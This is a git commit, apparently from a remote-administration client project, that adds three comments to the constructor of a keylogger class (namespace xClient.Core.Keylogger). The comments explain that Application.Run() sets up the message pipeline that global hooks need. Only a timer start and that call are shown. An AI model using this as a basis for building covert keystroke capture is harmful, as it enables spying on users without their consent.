Documentation for the Logger

Added a small amount of documentation for the Logger's constructor.
This commit is contained in:
yankejustin 2015-05-23 00:50:25 -04:00
parent 33435e4fab
commit dd85289fc5
1 changed files with 3 additions and 0 deletions

View File

@ -50,6 +50,9 @@ namespace xClient.Core.Keylogger
_timerFlush.Enabled = true; _timerFlush.Enabled = true;
_timerFlush.Start(); _timerFlush.Start();
// Initialize the application message pipeline.
// Necessary for setting global hooks because setting a global
// hook requires an established message pipeline for the thread.
Application.Run(); Application.Run();
} }